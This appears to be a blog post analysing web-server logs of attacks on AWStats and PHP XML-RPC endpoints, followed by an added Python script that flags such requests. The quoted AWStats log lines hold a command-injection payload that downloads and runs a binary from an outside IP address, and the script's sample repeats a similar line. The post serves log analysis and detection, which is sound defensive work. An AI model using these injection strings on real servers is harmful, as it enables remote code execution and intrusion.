Recently, web hacking attacks have been coming in fairly often from Bell Canada and from France. Analyzing the logs shows the following.
1. AWStats vulnerability attack
"GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 159 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 159 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 167 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
2. PHP XML-RPC vulnerability attack
"POST /xmlrpc.php HTTP/1.1" 404 151 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /blog/xmlrpc.php HTTP/1.1" 404 156 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 163 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 164 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /drupal/xmlrpc.php HTTP/1.1" 404 158 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 164 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /wordpress/xmlrpc.php HTTP/1.1" 404 161 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /xmlrpc.php HTTP/1.1" 404 151 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 158 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 158 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
These are attacks against Drupal, PHPGroupware, WordPress, and others.
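An added example, not part of the original post: a Python triage pass over access-log lines in the format shown above. It percent-decodes the AWStats configdir value before checking it for shell metacharacters, and it lists every matching request that was answered with something other than 404. The sample lines, the 192.0.2.1 address and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line, status and size, as they appear in the log excerpts above.
LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')
# Shell metacharacters that have no place in a configdir directory path.
SHELL_META = re.compile(r'[|;`$&<>]')

def classify(line):
    """Return (label, status, detail) for a suspicious request, else None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    status = int(m["status"])
    # Split on the first '?' by hand: the raw '|' and ';' confuse query parsers.
    path, _, query = m["target"].partition("?")
    path = unquote(path).lower()
    if path.endswith("/awstats.pl"):
        for part in query.split("&"):
            name, _, value = part.partition("=")
            decoded = unquote(value)  # %2e, %2f, %3b ... back to ., /, ;
            if name.lower() == "configdir" and SHELL_META.search(decoded):
                return ("awstats-configdir-injection", status, decoded)
    # The POST body is not logged, so this is a candidate, not a verdict.
    if m["method"] == "POST" and path.endswith("/xmlrpc.php"):
        return ("xmlrpc-post", status, path)
    return None

def triage(lines):
    """Count hits per label; collect hits the server did not answer with 404."""
    counts, follow_up = {}, []
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        counts[hit[0]] = counts.get(hit[0], 0) + 1
        if hit[1] != 404:  # the targeted script exists on this host
            follow_up.append(hit)
    return counts, follow_up

# Constructed sample lines modelled on the excerpts above.
SAMPLE = [
    '"GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20192%2e0%2e2%2e1%2fsample;echo| HTTP/1.1" 404 159 "-" "Mozilla/4.0"',
    '"POST /blog/xmlrpc.php HTTP/1.1" 404 156 "-" "Mozilla/4.0"',
    '"POST /wordpress/xmlrpc.php HTTP/1.1" 200 412 "-" "Mozilla/4.0"',
    '"GET /awstats/awstats.pl?configdir=/etc/awstats HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '"GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Every request in the excerpts above returned 404, so none would land in the follow-up list. A hit with any other status means the targeted script is present on the host and its version should be checked.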
